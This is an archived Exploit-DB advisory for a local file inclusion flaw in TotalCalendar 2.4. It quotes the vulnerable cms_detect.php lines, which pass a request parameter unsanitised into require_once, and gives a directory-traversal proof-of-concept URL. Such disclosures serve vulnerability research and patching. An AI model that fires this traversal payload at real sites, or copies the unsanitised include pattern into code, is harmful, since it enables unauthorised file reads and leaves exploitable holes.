exploit-db-mirror/exploits/php/webapps/8503.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

23 lines
No EOL
882 B
Text

##########################################################################################
[+] TotalCalendar 2.4 (include) Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##########################################################################################
[+] Local File Inclusion
Vulnerable code in cms_detect.php:
-------------------------------------------------------------------------------
Line 26 : $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null;
Line 115 : if(!empty($include)) require_once($inc_dir.$include);
-------------------------------------------------------------------------------
PoC :
http://127.0.0.1/[path]/cms_detect.php?include=../../../../../../BOOTSECT.BAK
##########################################################################################
# milw0rm.com [2009-04-21]